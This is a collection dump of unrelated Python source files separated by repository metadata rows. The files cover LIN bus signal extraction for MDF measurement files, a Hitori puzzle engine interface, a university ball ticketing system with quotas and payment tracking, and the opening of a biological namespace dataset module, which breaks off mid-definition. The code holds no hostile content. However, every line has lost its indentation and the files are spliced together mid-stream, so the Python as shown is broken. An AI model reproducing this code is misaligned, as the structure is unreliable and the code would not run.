try:
current_not_found_ids.remove((msg_id, message.name))
except KeyError:
pass
unknown_ids[msg_id].append(False)
idx = np.argwhere(bus_msg_ids == msg_id).ravel()
payload = bus_data_bytes[idx]
t = bus_t[idx]
extracted_signals = extract_mux(
payload,
message,
msg_id,
0,
t,
original_message_id=None,
ignore_value2text_conversion=ignore_value2text_conversion,
)
for entry, signals in extracted_signals.items():
if len(next(iter(signals.values()))["samples"]) == 0:
continue
if entry not in msg_map:
sigs = []
index = len(out.groups)
msg_map[entry] = index
for name_, signal in signals.items():
sig = Signal(
samples=signal["samples"],
timestamps=signal["t"],
name=signal["name"],
comment=signal["comment"],
unit=signal["unit"],
invalidation_bits=signal["invalidation_bits"]
if ignore_invalid_signals
else None,
)
sig.comment = f"""\
<CNcomment>
<TX>{sig.comment}</TX>
<names>
<display>
LIN.{message.name}.{signal['name']}
</display>
</names>
</CNcomment>"""
sigs.append(sig)
cg_nr = out.append(
sigs,
acq_name=f"from LIN message ID=0x{msg_id:X}",
comment=f"{message} 0x{msg_id:X}",
common_timebase=True,
)
if ignore_invalid_signals:
max_flags.append([False])
for ch_index, sig in enumerate(sigs, 1):
max_flags[cg_nr].append(
np.all(sig.invalidation_bits)
)
else:
index = msg_map[entry]
sigs = []
for name_, signal in signals.items():
sigs.append(
(
signal["samples"],
signal["invalidation_bits"]
if ignore_invalid_signals
else None,
)
)
t = signal["t"]
if ignore_invalid_signals:
for ch_index, sig in enumerate(sigs, 1):
max_flags[index][ch_index] = max_flags[index][
ch_index
] or np.all(sig[1])
sigs.insert(0, (t, None))
out.extend(index, sigs)
self._set_temporary_master(None)
group.record = None
cntr += 1
if self._callback:
self._callback(cntr, count)
if current_not_found_ids:
not_found_ids[dbc_name] = list(current_not_found_ids)
unknown_ids = {
msg_id for msg_id, not_found in unknown_ids.items() if all(not_found)
}
self.last_call_info["LIN"] = {
"dbc_files": dbc_files,
"total_unique_ids": total_unique_ids,
"unknown_id_count": len(unknown_ids),
"not_found_ids": not_found_ids,
"found_ids": found_ids,
"unknown_ids": unknown_ids,
}
if ignore_invalid_signals:
to_keep = []
for i, group in enumerate(out.groups):
for j, channel in enumerate(group.channels[1:], 1):
if not max_flags[i][j]:
to_keep.append((None, i, j))
tmp = out.filter(to_keep, out.version)
out.close()
out = tmp
if self._callback:
self._callback(100, 100)
if not out.groups:
logger.warning(
f'No LIN signals could be extracted from "{self.name}". The'
"output file will be empty."
)
return out
@property
def start_time(self):
"""getter and setter the measurement start timestamp
Returns
-------
timestamp : datetime.datetime
start timestamp
"""
return self.header.start_time
@start_time.setter
def start_time(self, timestamp):
self.header.start_time = timestamp
def cleanup_timestamps(
self, minimum, maximum, exp_min=-15, exp_max=15, version=None
):
"""convert *MDF* to other version
.. versionadded:: 5.22.0
Parameters
----------
minimum : float
minimum plausible time stamp
maximum : float
maximum plausible time stamp
exp_min (-15) : int
minimum plausible exponent used for the time stamps float values
exp_max (15) : int
maximum plausible exponent used for the time stamps float values
version : str
new mdf file version from ('2.00', '2.10', '2.14', '3.00', '3.10',
'3.20', '3.30', '4.00', '4.10', '4.11', '4.20'); default the same as
the input file
Returns
-------
out : MDF
new *MDF* object
"""
if version is None:
version = self.version
else:
version = validate_version_argument(version)
out = MDF(version=version)
out.header.start_time = self.header.start_time
groups_nr = len(self.virtual_groups)
if self._callback:
self._callback(0, groups_nr)
cg_nr = None
self.configure(copy_on_get=False)
# walk through all groups and get all channels
for i, virtual_group in enumerate(self.virtual_groups):
for idx, sigs in enumerate(
self._yield_selected_signals(virtual_group, version=version)
):
if idx == 0:
if sigs:
t = sigs[0].timestamps
if len(t):
all_ok, idx = plausible_timestamps(
t, minimum, maximum, exp_min, exp_max
)
if not all_ok:
t = t[idx]
if len(t):
for sig in sigs:
sig.samples = sig.samples[idx]
sig.timestamps = t
if sig.invalidation_bits is not None:
sig.invalidation_bits = (
sig.invalidation_bits[idx]
)
cg = self.groups[virtual_group].channel_group
cg_nr = out.append(
sigs,
acq_name=getattr(cg, "acq_name", None),
acq_source=getattr(cg, "acq_source", None),
comment=f"Timestamps cleaned up and converted from {self.version} to {version}",
common_timebase=True,
)
else:
break
else:
t, _ = sigs[0]
if len(t):
all_ok, idx = plausible_timestamps(
t, minimum, maximum, exp_min, exp_max
)
if not all_ok:
t = t[idx]
if len(t):
for i, (samples, invalidation_bits) in enumerate(sigs):
if invalidation_bits is not None:
invalidation_bits = invalidation_bits[idx]
samples = samples[idx]
sigs[i] = (samples, invalidation_bits)
out.extend(cg_nr, sigs)
if self._callback:
self._callback(i + 1, groups_nr)
if self._terminate:
return
out._transfer_metadata(self)
self.configure(copy_on_get=True)
if self._callback:
out._callback = out._mdf._callback = self._callback
return out
def whereis(self, channel, source_name=None, source_path=None):
"""get ocurrences of channel name in the file
Parameters
----------
channel : str
channel name string
source_name (None) : str
filter occurrences using source name
source_path (None) : str
filter occurrences using source path
.. versionadded:: 6.0.0
Returns
-------
ocurrences : tuple
Examples
--------
>>> mdf = MDF(file_name)
>>> mdf.whereis('VehicleSpeed') # "VehicleSpeed" exists in the file
((1, 2), (2, 4))
>>> mdf.whereis('VehicleSPD') # "VehicleSPD" doesn't exist in the file
()
"""
try:
occurrences = self._filter_occurrences(
self.channels_db[channel], source_name=source_name, source_path=source_path
)
except:
occurrences = tuple()
return tuple(occurrences)
if __name__ == "__main__":
pass
| lgpl-3.0 | 1,954,601,776,935,667,000 | 35.478159 | 139 | 0.448425 | false | 4.899633 | false | false | false |
nathandaddio/puzzle_app | puzzle_app/puzzle_app/engine_api/hitori_engine_api.py | 1 | 1556 | from collections import namedtuple
import transaction
from marshmallow import (
fields,
Schema,
post_load
)
from puzzle_app.schemas.hitori import (
HitoriGameBoardCellSchema,
HitoriGameBoardSchema
)
from puzzle_app.models import (
db_session_maker
)
from puzzle_app.models.hitori import (
HitoriGameBoardCell,
HitoriGameBoard,
HitoriSolve,
HITORI_SOLVE_STATUS
)
def make_hitori_engine_data(hitori_game_board_id):
db_session = db_session_maker()
hitori_game_board = db_session.query(HitoriGameBoard).get(hitori_game_board_id)
return HitoriGameBoardSchema(strict=True).dump(hitori_game_board).data
HitoriSolution = namedtuple('HitoriSolution', ['board', 'cells_on', 'cells_off', 'feasible'])
def read_hitori_engine_data(hitori_engine_solution):
solution = HitoriSolution(**hitori_engine_solution)
with transaction.manager:
db_session = db_session_maker()
board = db_session.query(HitoriGameBoard).get(solution.board)
board.solved = True
board.feasible = solution.feasible
for cell_id in solution.cells_on:
db_session.query(HitoriGameBoardCell).get(cell_id).included_in_solution = True
for cell_id in solution.cells_off:
db_session.query(HitoriGameBoardCell).get(cell_id).included_in_solution = False
def update_hitori_solve_status(solve_id, status):
with transaction.manager:
db_session = db_session_maker()
db_session.query(HitoriSolve).get(solve_id).status = HITORI_SOLVE_STATUS[status]
| mit | -4,959,705,911,207,896,000 | 26.298246 | 93 | 0.710797 | false | 3.143434 | false | false | false |
danielrichman/snowball-ticketing | snowball_ticketing/tickets/__init__.py | 1 | 25949 | # Copyright 2013 Daniel Richman
#
# This file is part of The Snowball Ticketing System.
#
# The Snowball Ticketing System is free software: you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the License,
# or (at your option) any later version.
#
# The Snowball Ticketing System is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with The Snowball Ticketing System. If not, see
# <http://www.gnu.org/licenses/>.
"""tickets - tickets table manipulation functions"""
from __future__ import unicode_literals
import re
from datetime import datetime
import flask
from werkzeug.datastructures import ImmutableDict
from .. import utils, queries
__all__ = ["available", "quotas_per_person_sentence", "none_min",
"counts", "prices", "settings", "tickets",
"BuyFailed", "InsufficientSpare", "QPPAnyMet", "QPPTypeMet",
"FormRace", "IncorrectMode", "QuotaMet", "QuotaNotMet",
"WaitingQuotaMet",
"buy", "buy_lock", "user_pg_lock", "set_quota_met",
"FinaliseRace", "AlreadyFinalised", "NonExistantTicket",
"finalise", "outstanding_balance",
"mark_paid", "purge_unpaid", "waiting_release"]
logger = utils.getLogger("snowball_ticketing.tickets")
buy_pg_lock_num = (0x123abc, 100)
user_pg_lock_num = 0x124000
_null_settings_row = \
ImmutableDict({"quota": None, "quota_met": None,
"waiting_quota": None, "waiting_quota_met": None,
"waiting_smallquota": None, "quota_per_person": None,
"mode": 'available'})
def available(ticket_type, user_group=None, pg=utils.postgres):
"""
Find out whether `user_group` can buy `ticket_type` tickets
Returns a dict, with the following keys:
* `mode`: one of ``not-yet-open``, ``available`` or ``closed``
* `spare`: how many more can be bought
* `waiting_spare`: how many can be added to the waiting list
* `waiting_small`: Is `waiting count` < ``waiting_smallquota``?
* `qpp_any`: The smallest ``quota_per_person`` applying to any ticket type
* `qpp_type`: The smallest ``quota_per_person`` applying to this ticket type
The last five keys may be ``None``, corresponding to "no limit".
"""
if user_group is None:
user_group = _user_group_from_user(flask.session["user"])
s = settings(pg=pg)
c = counts(pg=pg)
result = {}
overall_mode = 'available'
overall_spare = None
overall_quota_met = None
overall_waiting_spare = None
overall_waiting_quota_met = None
overall_qpp_type = None
overall_qpp_any = None
waiting_small = None
for test in _test_keys(user_group, ticket_type):
limits = s.get(test, _null_settings_row)
mode = limits["mode"]
quota = limits["quota"]
quota_met = limits["quota_met"]
count = c["{0}_{1}".format(*test)]
waiting_quota = limits["waiting_quota"]
waiting_quota_met = limits["waiting_quota_met"]
waiting_smallquota = limits["waiting_smallquota"]
waiting_count = c["waiting_{0}_{1}".format(*test)]
overall_mode = _mode_precedence(overall_mode, mode)
if quota is not None:
spare = quota - count
if spare <= 0 and not quota_met:
logger.warning("quota_met should be set: %r", test)
quota_met = True
overall_quota_met = overall_quota_met or quota_met
else:
spare = None
if waiting_quota is not None:
waiting_spare = waiting_quota - waiting_count
if waiting_spare <= 0 and not waiting_quota_met:
logger.warning("waiting_quota_met should be set: %r", test)
waiting_quota_met = True
overall_waiting_quota_met = \
overall_waiting_quota_met or waiting_quota_met
else:
waiting_spare = None
overall_spare = none_min(overall_spare, spare)
overall_waiting_spare = none_min(overall_waiting_spare, waiting_spare)
waiting_small = \
_waiting_smallquota_test(waiting_small, waiting_smallquota,
waiting_count)
qpp = limits["quota_per_person"]
if test[1] == 'any':
overall_qpp_any = none_min(overall_qpp_any, qpp)
else:
overall_qpp_type = none_min(overall_qpp_type, qpp)
return {"mode": overall_mode,
"spare": overall_spare,
"quota_met": overall_quota_met,
"waiting_spare": overall_waiting_spare,
"waiting_quota_met": overall_waiting_quota_met,
"waiting_small": waiting_small,
"qpp_any": overall_qpp_any,
"qpp_type": overall_qpp_type}
def _test_keys(user_group, ticket_type):
return ((user_group, ticket_type), (user_group, "any"),
("all", ticket_type), ("all", "any"))
def _mode_precedence(a, b):
"""
return the 'largest' of `a` and `b`
order: closed > not-yet-open > available
"""
modes = ('closed', 'not-yet-open', 'available')
assert a in modes and b in modes
for o in modes:
if a == o or b == o:
return o
else:
raise AssertionError
def _waiting_smallquota_test(old_value, quota, waiting_count):
if old_value is False:
# another rule's smallquota was not met,
# which takes precedence (think Order allow, deny)
return False
if quota is None:
# no smallquota for this row
# None -> None; True -> True
return old_value
if waiting_count < quota:
# (None, True) -> True
return True
else:
# (None, True) -> False
return False
def quotas_per_person_sentence(user_group=None, pg=utils.postgres):
"""
Get the quotas-per-person sentence for `user_group` (or the current user)
"""
if user_group is None:
user_group = _user_group_from_user(flask.session["user"])
s = settings(pg=pg)
for g in (user_group, 'all'):
p = s.get((g, 'any'), {}).get('quota_per_person_sentence')
if p is not None:
return p
else:
raise AssertionError("qpp_sentence not set for {0}".format(user_group))
def mode_sentence(pg=utils.postgres):
"""Get the "mode sentence" (describes availability)"""
return settings(pg=pg).get(('all', 'any'), {}).get("mode_sentence")
def none_min(a, b):
"""Return min(a, b), treating ``None`` as infinity"""
if a is None:
return b
if b is None:
return a
else:
return min(a, b)
def counts(drop_cache=False, pg=utils.postgres):
"""
Counts various types in the tickets table
Will used a cached result if `drop_cache` is ``False`` (and there is one
available)
Returns a dict, with keys
``{,waiting_}{all,members,alumni}_{any,standard,vip}`` and values being the
respective counts
"""
if not drop_cache and flask.current_app and \
hasattr(flask.g, '_snowball_tickets_counts'):
return flask.g._snowball_tickets_counts
with pg.cursor(True) as cur:
cur.execute(queries.unexpired_counts)
c = cur.fetchone()
if flask.current_app:
flask.g._snowball_tickets_counts = c
return c
def prices(user_group=None, pg=utils.postgres):
"""
Gets ticket prices for `user_group` (or the current user)
Returns a dict, ``{'standard': N, 'vip': N}``.
"""
if user_group is None:
user_group = _user_group_from_user(flask.session["user"])
s = settings(pg=pg)
r = {}
for type in ('standard', 'vip'):
for key in ((user_group, type), ('all', type),
(user_group, 'any'), ('all', 'any')):
p = s.get(key, {}).get('price')
if p is not None:
r[type] = p
break
else:
raise AssertionError("unset price for {0}"
.format((user_group, type)))
return r
def _user_group_from_user(user):
"""Return the user group for the user row `user`"""
pt = user["person_type"]
assert pt != 'non-cam'
if pt == 'alumnus':
return 'alumni'
else:
return 'members'
def settings(pg=utils.postgres):
"""Retrieve (with caching) the rows of the tickets_settings table"""
if flask.current_app and hasattr(flask.g, '_snowball_tickets_settings'):
return flask.g._snowball_tickets_settings
key = ("who", "what")
s = {}
with pg.cursor(True) as cur:
cur.execute("SELECT * FROM tickets_settings")
for row in cur:
row_key = tuple([row[k] for k in key])
s[row_key] = row
if flask.current_app:
flask.g._snowball_tickets_settings = s
return s
def tickets(user_id=None, vip=None, waiting_list=None, quota_exempt=None,
finalised=None, paid=None, entered_ball=None, expired=None,
pg=utils.postgres):
"""
Return tickets for a user `user_id`, with filtering.
For each of `finalised`, `paid` and `entered_ball` - if the argument is
``True`` then that timestamp must be non-null; ``False`` it is required
to be null; ``None`` - no condition
For `expires`, ``False`` demands the expires column be null, or in the
future; ``True`` wants a non-null timestamp in the past.
If `user_id` is ``None``, the current session's user is used.
"""
if user_id is None:
user_id = flask.session["user_id"]
cond1 = _nully_conditions(finalised=finalised, paid=paid,
entered_ball=entered_ball)
cond2 = _booly_conditions(vip=vip, waiting_list=waiting_list,
quota_exempt=quota_exempt)
if expired is True:
expires_cond = "(expires IS NOT NULL AND expires <= utcnow())"
elif expired is False:
expires_cond = "(expires IS NULL OR expires > utcnow())"
else:
expires_cond = "TRUE"
cond = " AND ".join(["user_id = %s", expires_cond, cond1, cond2])
query = "SELECT * FROM tickets WHERE " + cond
with pg.cursor(True) as cur:
cur.execute(query, (user_id, ))
return cur.fetchall()
def _nully_conditions(**kwargs):
"""
Generate IS [ NOT ] NULL conditions for the keys in `kwargs`
Several columns in the tickets table are timestamps,
where their being non-null indicates that something has happened;
for example, `tickets.finalised` being non-null means that a ticket
is finalised.
For each key, where `value` is ``kwargs[key]``:
*If `value` is ``None``, no condition is generated - i.e., "don't care" or
"all"
*If `value` is ``True``, produces the condition "{name} IS NOT NULL"
*If `value` is ``False``, produces the condition "{name} IS NULL"
The conditions are joined with ``AND`` and wrapped in parentheses
"""
conditions = []
for key, value in kwargs.items():
if value is True:
conditions.append(key + " IS NOT NULL")
elif value is False:
conditions.append(key + " IS NULL")
if not conditions:
return "TRUE"
else:
return "(" + ' AND '.join(conditions) + ")"
def _booly_conditions(**kwargs):
"""
Generate conditions for the keys in `kwargs`
For each key, where `value` is ``kwargs[key]``:
*If `value` is ``None``, no condition is generated - i.e., "don't care" or
"all"
*If `value` is ``True``, produces the condition "{name}"
*If `value` is ``False``, produces the condition "NOT {name}"
The conditions are joined with ``AND`` and wrapped in parentheses
"""
conditions = []
for key, value in kwargs.items():
if value is True:
conditions.append(key)
elif value is False:
conditions.append("NOT " + key)
if not conditions:
return "TRUE"
else:
return "(" + ' AND '.join(conditions) + ")"
class BuyFailed(Exception):
"""A call to :func:`buy` failed"""
class InsufficientSpare(BuyFailed):
"""Insufficient spare tickets"""
class QPPAnyMet(BuyFailed):
"""Quota per person limit (any ticket type) met"""
class QPPTypeMet(BuyFailed):
"""Quota per person limit (specific ticket type) met"""
class FormRace(BuyFailed):
"""Between displaying options and submitting things changed"""
class IncorrectMode(FormRace):
"""Tickets are not ``available``"""
class QuotaMet(FormRace):
"""The quota has been met"""
class QuotaNotMet(FormRace):
"""The quota has not been met (and so you may not join the waiting list)"""
class WaitingQuotaMet(QuotaMet):
"""The waiting quota has been met"""
def buy(ticket_type, waiting_list, number,
user=None, quota_exempt=False, pg=utils.postgres):
"""Buy `user` `number` `ticket_type` tickets / add to waiting list."""
if user is None:
user = flask.session["user"]
user_id = user["user_id"]
user_group = _user_group_from_user(user)
if not waiting_list:
verb = ('buying', '')
else:
verb = ('adding', ' to the waiting list')
log_prefix = "{0} {1} {2} tickets for user {3} ({4}){5}" \
.format(verb[0], number, ticket_type, user_id, user_group, verb[1])
# automatically released, recursive
buy_lock(pg=pg)
user_pg_lock(user["user_id"], pg=pg)
vip = ticket_type == 'vip'
# force a re-count having acquired the lock
ticket_counts = counts(drop_cache=True, pg=pg)
if not quota_exempt:
avail = available(ticket_type, user_group=user_group, pg=pg)
qpp_any_count = 0
qpp_type_count = 0
for ticket in tickets(user_id=user_id, expired=False,
quota_exempt=False, pg=pg):
qpp_any_count += 1
if ticket["vip"] == vip:
qpp_type_count += 1
qpp_any = avail["qpp_any"]
qpp_type = avail["qpp_type"]
if qpp_any is not None:
if qpp_any < qpp_any_count + number:
raise QPPAnyMet
if qpp_type is not None:
if qpp_type < qpp_type_count + number:
raise QPPTypeMet
if avail["mode"] != "available":
logger.info("%s: not available (form race)", log_prefix)
raise IncorrectMode
if waiting_list and not avail["quota_met"]:
logger.info("%s: wanted waiting list but quota not met (form race)",
log_prefix)
raise QuotaNotMet
if not waiting_list:
quota_met = avail["quota_met"]
spare = avail["spare"]
else:
quota_met = avail["waiting_quota_met"]
spare = avail["waiting_spare"]
if quota_met:
logger.info("%s: quota met (form race)", log_prefix)
if waiting_list:
raise WaitingQuotaMet
else:
raise QuotaMet
if spare is not None and spare < number:
logger.info("%s: insufficient spare (%s < %s)", log_prefix,
spare, number)
set_quota_met(user_group, ticket_type, waiting_list, number, pg=pg)
raise InsufficientSpare
elif spare == number:
logger.info("%s: exactly met quota", log_prefix)
set_quota_met(user_group, ticket_type, waiting_list, number, pg=pg)
# else... OK. Make some tickets
query = "INSERT INTO tickets (user_id, vip, waiting_list, price, "\
" created, expires, expires_reason, quota_exempt) "
values_row = "(%(user_id)s, %(vip)s, %(waiting_list)s, %(price)s, " \
"utcnow(), utcnow() + '10 minutes'::interval, " \
"'not-finalised', %(quota_exempt)s)"
values = ', '.join([values_row] * number)
query += "VALUES " + values + " RETURNING ticket_id"
price = prices(user_group=user_group, pg=pg)[ticket_type]
args = {"user_id": user_id, "vip": vip, "waiting_list": waiting_list,
"price": price, "quota_exempt": quota_exempt}
# if :func:`counts` is cached on flask.g, this will update it
if waiting_list:
p = "waiting_{0}_{1}"
else:
p = "{0}_{1}"
for test in _test_keys(user_group, ticket_type):
ticket_counts[p.format(*test)] += number
with pg.cursor() as cur:
cur.execute(query, args)
ids = [r[0] for r in cur]
logger.info("%s: inserted tickets %r", log_prefix, ids)
return ids
def buy_lock(pg=utils.postgres):
"""Take out the transaction level postgres advisory lock for buying"""
logger.debug("Acquiring buy lock")
with pg.cursor() as cur:
cur.execute("SELECT pg_advisory_xact_lock(%s, %s)", buy_pg_lock_num)
logger.debug("buy lock acquired")
def user_pg_lock(user_id, pg=utils.postgres):
"""
Take out the transaction level postgres advisory lock for `user_id`
This lock is acquired by :func:`buy`, :func:`finalise` and
:func:`receipt.send_update`.
"""
logger.debug("Acquiring user %s lock", user_id)
with pg.cursor() as cur:
cur.execute("SELECT pg_advisory_xact_lock(%s, %s)",
(user_pg_lock_num, user_id))
logger.debug("user %s lock acquired", user_id)
def set_quota_met(user_group, ticket_type, waiting_list, number,
pg=utils.postgres):
"""
Take action when a quota has been met.
Suppose:
* person A buys the last 4 tickets
* person B then has to go on the waiting list
* ten minutes later, A has not finalised their tickets and so they expire
* person C coould now come and buy those 4 tickets, jumping B in the queue
Hence: as soon as we `meet` the quota, change the mode.
Note: this is not as soon as we go `over` the quota - hitting it exactly
counts, since as soon as the quota is met the text will show
'waiting list' on the buy buttons.
"""
s = settings(pg=pg)
c = counts(pg=pg)
rows_quota_met = []
rows_waiting_quota_met = []
for test in _test_keys(user_group, ticket_type):
limits = s.get(test, _null_settings_row)
assert limits["mode"] == 'available'
just_set_quota_met = False
if not waiting_list:
quota = limits["quota"]
count = c["{0}_{1}".format(*test)]
if quota is not None and not limits["quota_met"] and \
count + number >= quota:
logger.warning("quota met: %r", test)
rows_quota_met.append(test)
# if `s` came from or was saved to the cache on flask.g,
# this will update it.
s.get(test, {})["quota_met"] = True
# now check if the waiting quota has been met; it could happen
# instantly
just_set_quota_met = True
if waiting_list or just_set_quota_met:
quota = limits["waiting_quota"]
count = c["waiting_{0}_{1}".format(*test)]
if just_set_quota_met:
number2 = 0
else:
number2 = number
if quota is not None and not limits["waiting_quota_met"] and \
count + number2 >= quota:
logger.warning("waiting quota met: %r", test)
rows_waiting_quota_met.append(test)
s.get(test, {})["waiting_quota_met"] = True
if rows_quota_met:
logger.info("set_quota_met: setting quota_met on rows %r", rows_quota_met)
with pg.cursor() as cur:
cur.execute("UPDATE tickets_settings SET quota_met = TRUE "
"WHERE (who, what) IN %s", (tuple(rows_quota_met), ))
if rows_waiting_quota_met:
logger.info("set_quota_met: setting waiting_quota_met on rows %r",
rows_waiting_quota_met)
with pg.cursor() as cur:
cur.execute("UPDATE tickets_settings SET waiting_quota_met = TRUE "
"WHERE (who, what) IN %s",
(tuple(rows_waiting_quota_met), ))
class FinaliseRace(Exception):
"""A race condition occured in :func:`finalise`"""
class AlreadyFinalised(FinaliseRace):
"""
The ticket was already finalised
.. attribute:: new_ticket
The ticket, as it now exists in the database finalised.
"""
def __init__(self, new_ticket):
self.new_ticket = new_ticket
class NonExistantTicket(FinaliseRace):
"""The ticket does not exist"""
def finalise(ticket, update, pg=utils.postgres):
"""
Finalise a ticket
Essentially does this::
ticket["finalised"] = datetime.utcnow()
ticket.update(update)
But also updates the corresponding database row, and will avoid a race.
Does not check if the ticket is expired. Loading the tickets at the start
of :func:`snowball_ticketing.tickets.views.details` should not race against
the ticket expiring since ``utcnow()`` remains constant in a transaction.
If the ticket is deleted between loading and updating,
:class:`NonExistantTicket` will be raised and `ticket` won't be modified.
If the ticket was already finalised, :class:`AlreadyFinalised` is raised.
"""
assert ticket["finalised"] is None
assert set(update) <= {"person_type", "surname", "othernames",
"college_id", "matriculation_year"}
logger.debug("finalising ticket %s", ticket["ticket_id"])
# protects against races with receipt
user_pg_lock(ticket["user_id"], pg=pg)
update = update.copy()
# special case finalise to use utcnow()
update["expires"] = None
update["expires_reason"] = None
sets = ', '.join("{0} = %({0})s".format(key) for key in update)
query1 = "UPDATE tickets " \
"SET finalised = utcnow(), " + sets + " " \
"WHERE ticket_id = %(ticket_id)s AND finalised IS NULL " \
"RETURNING *"
query2 = "SELECT * FROM tickets WHERE ticket_id = %s"
args = update
args["ticket_id"] = ticket["ticket_id"]
with pg.cursor(True) as cur:
cur.execute(query1, args)
assert cur.rowcount in (0, 1)
if cur.rowcount == 1:
# success
ticket.update(cur.fetchone())
else:
# some race
cur.execute(query2, (ticket["ticket_id"], ))
assert cur.rowcount in (0, 1)
if cur.rowcount == 1:
raise AlreadyFinalised(cur.fetchone())
else:
raise NonExistantTicket
_reference_first_cleaner = re.compile("[^a-zA-Z0-9]")
def reference(user=None):
"""Get the payment reference `user` should use"""
if user is None:
user = flask.session["user"]
if user["crsid"]:
first = user["crsid"]
else:
first = _reference_first_cleaner.sub("", user["email"])[:9]
# we're aiming for < 18 characters. The id isn't going to realistically
# be longer than 4 characters, so this will work just fine.
second = unicode(user["user_id"]).rjust(4, "0")
return "{0}/{1}".format(first, second)
def outstanding_balance(user_id=None, ids_too=False, pg=utils.postgres):
"""
Get the total unpaid for `user_id` (or the current user)
If `ids_too` is ``True``, returns ``total unpaid, ticket_ids``
"""
ts = tickets(user_id=user_id, finalised=True, paid=False,
waiting_list=False, pg=pg)
bal = sum(t["price"] for t in ts)
if ids_too:
ids = [t["ticket_id"] for t in ts]
return bal, ids
else:
return bal
def mark_paid(ticket_ids, add_note="", pg=utils.postgres):
"""Mark each of `ticket_ids` paid, optionally adding to `notes`"""
query = "UPDATE tickets " \
"SET paid = utcnow(), notes = notes || %s " \
"WHERE ticket_id IN %s AND paid IS NULL"
with pg.cursor() as cur:
cur.execute(query, (add_note, tuple(ticket_ids)))
assert cur.rowcount == len(ticket_ids)
def purge_unpaid(user_id, ticket_id, pg=utils.postgres):
"""
Mark `ticket_id` unpaid and unfinalised
`user_id` must match the `user_id` on the ticket (safety check).
"""
query = "UPDATE tickets " \
"SET finalised = NULL, expires = utcnow(), " \
" expires_reason = 'not-paid' " \
"WHERE finalised IS NOT NULL AND paid IS NULL AND " \
" NOT waiting_list AND " \
" user_id = %s AND ticket_id = %s"
logger.info("Purging ticket %s (not-paid)", ticket_id,
extra={"user_id": user_id})
with pg.cursor() as cur:
cur.execute(query, (user_id, ticket_id))
assert cur.rowcount == 1
def waiting_release(user_id, ticket_ids, ask_pay_within=7, pg=utils.postgres):
"""Release tickets to `user_id`, and send them an email"""
query = "UPDATE tickets SET waiting_list = FALSE, notes = notes || %s " \
"WHERE finalised IS NOT NULL AND waiting_list AND " \
" ticket_id IN %s AND user_id = %s"
notes = "Released from waiting list on {0}\n".format(datetime.utcnow())
logger.info("Releasing tickets %s from waiting list", list(ticket_ids),
extra={"user_id": user_id})
with pg.cursor() as cur:
cur.execute(query, (notes, tuple(ticket_ids), user_id))
assert cur.rowcount == len(ticket_ids)
# :-( :-( circular import.
from . import receipt
receipt.send_update(user_id, pg=pg, ask_pay_within=ask_pay_within,
waiting_release=True)
| gpl-3.0 | -6,056,314,305,332,957,000 | 31.68136 | 82 | 0.589002 | false | 3.673935 | true | false | false |
OpenBEL/resource-generator | datasets.py | 1 | 33416 |
'''
datasets.py
Represent each parsed dataset as an object. This is
really just a wrapper to the underlying dictionaries,
but it also provides some useful functions that assist
in the namespacing and equivalencing process.
'''
import os.path
import time
from common import get_citation_info
from collections import defaultdict
class DataSet():
def __init__(self, dictionary={}, prefix='unnamed-data-object'):
self._dict = dictionary
self._prefix = prefix
def get_values(self):
''' Get all non-obsolete primary ids in dictionary.'''
for term_id in self._dict:
if self._dict.get(term_id).get('is_obsolete'):
continue
else:
yield term_id
def __str__(self):
return self._prefix
class OrthologyData(DataSet):
def __init__(self, dictionary={}, prefix='use-index-term-prefix'):
super().__init__(dictionary, prefix)
def get_orthologs(self, term_id):
orthologs = set()
mapping = self._dict.get(term_id)
mouse_orthologs = mapping.get('mouse_ortholog_id').split('|')
orthologs.update(mouse_orthologs)
if mapping.get('human_ortholog_id') is not '':
human_orthologs = mapping.get('human_ortholog_id').split('|')
human_orthologs = {'HGNC:' + ortho for ortho in human_orthologs}
orthologs.update(human_orthologs)
return orthologs
def __str__(self):
return self._prefix + '_ortho'
class HomologeneData(OrthologyData):
def __init__(self, dictionary={}, prefix='egid'):
super().__init__(dictionary, prefix)
def get_values(self):
for term_id in self._dict['gene_ids']:
yield term_id
def get_orthologs(self, term_id):
orthologs = set()
mapping = self._dict.get('gene_ids').get(term_id)
group = mapping.get('homologene_group')
species = mapping.get('tax_id')
for k, v in self._dict['homologene_groups'][group].items():
if k == species and len(v) > 1:
return set() # stop here, don't return any orthologs since homologene group contains paralog
elif k == species:
next
elif k != species and len(v) == 1:
orthologs.update(v)
else:
print(
"WARNING! Missed case {0} - {1} - {2}".format(term_id, k, v))
orthologs = {'EGID:' + o for o in orthologs}
return orthologs
class HistoryDataSet(DataSet):
def __init__(self, dictionary={}, prefix='use-index-term-prefix'):
super().__init__(dictionary, prefix)
def get_id_update(self, term_id):
''' given an id, return the current value or "withdrawn". '''
mapping = self._dict.get(term_id)
if mapping is not None:
if mapping.get('status') == 'withdrawn':
value = 'withdrawn'
else:
value = mapping.get('new_id')
else:
value = None
return value
def get_obsolete_ids(self):
''' return dict with all obsolete ids, and current value.'''
value = None
replacement_dict = {}
for term_id in self._dict:
mapping = self._dict.get(term_id)
if mapping.get('status') == 'withdrawn':
value = 'withdrawn'
else:
value = self.get_id_update(term_id)
replacement_dict[term_id] = value
return replacement_dict
def __str__(self):
return self._prefix + '_history'
class NamespaceDataSet(DataSet):
ids = False # make .belns file containing labels (default = False)
labels = True # make .bels file containing ids (default = True)
# namespace ('ns') and/or annotation ('anno') concept scheme
scheme_type = ['ns']
def __init__(
self,
dictionary={},
name='namespace-name',
prefix='namespace-prefix',
domain=['other']):
self._name = name
self._domain = domain
super().__init__(dictionary, prefix)
def get_label(self, term_id):
''' Return the value to be used as the preferred
label for the associated term id. Use id as default,
but will generally be a name/symbol. '''
return term_id
def get_xrefs(self, term_id):
''' Return equivalences to other namespaces (or None). '''
return None
def get_name(self, term_id):
''' Return the term name to use as title (or None). '''
try:
name = self._dict.get(term_id).get('name')
return name
except:
return None
def get_species(self, term_id):
''' Return species as NCBI tax ID (or None, as applicable). '''
return None
def get_encoding(self, term_id):
''' Return encoding (allowed abundance types) for value.
Default = 'A' (Abundance). '''
return 'A'
def get_concept_type(self, term_id):
# TODO - merge with get_encoding
''' For Annotation Concept Schemes, return set of AnnotationConcept types.
Default = 'AnnotationConcept' (parent class) '''
if 'anno' not in self.scheme_type:
return None
else:
return {'AnnotationConcept'}
def get_alt_symbols(self, term_id):
''' Return set of symbol synonyms. Default = None. '''
return None
def get_alt_names(self, term_id):
